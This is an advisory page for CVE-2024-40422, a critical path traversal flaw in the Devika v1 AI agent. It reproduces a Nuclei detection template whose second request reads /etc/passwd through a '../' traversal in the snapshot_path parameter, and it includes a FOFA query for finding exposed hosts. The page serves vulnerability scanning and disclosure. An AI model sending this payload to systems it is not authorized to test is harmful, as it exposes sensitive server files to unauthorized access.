Devika v1 - Path Traversal

2024-08-0517:49:38

ProjectDiscovery

github.com

devika

path traversal

vulnerability

unauthorized access

critical

cve2024

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

AI Score

Confidence

Low

JSON

The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.

id: CVE-2024-40422

info:
  name: Devika v1 - Path Traversal
  author: securityforeveryone,alpernae
  severity: critical
  description: |
    The snapshot_path parameter in the /api/get-browser-snapshot endpoint in stitionai devika v1 is susceptible to a path traversal attack. An attacker can manipulate the snapshot_path parameter to traverse directories and access sensitive files on the server. This can potentially lead to unauthorized access to critical system files and compromise the confidentiality and integrity of the system.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-40422
    - https://cvefeed.io/vuln/detail/CVE-2024-40422
    - https://github.com/alpernae/CVE-2024-40422
    - https://github.com/stitionai/devika
    - https://www.exploit-db.com/exploits/52066
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2024-40422
    cwe-id: CWE-22
    epss-score: 0.0087
    epss-percentile: 0.82513
    cpe: cpe:2.3:a:stitionai:devika:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: stitionai
    product: devika
    fofa-query: icon_hash="-1429839495"
  tags: cve,cve2024,devika,lfi

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /api/data HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"models","projects","OPENAI","OLLAMA")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/get-browser-snapshot?snapshot_path=../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: header
        words:
          - 'application/octet-stream'

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ecbd6f0f8bc5ab7f040249fb93a67414c053613bd77c2fa53cd7951ca4a38947022100b0cd1ed056a2ee85ce893c451bf0cc564c2aae3254c2ef2a08c5bdf5d2386392:922c64590222798bb761d5b6d8e72950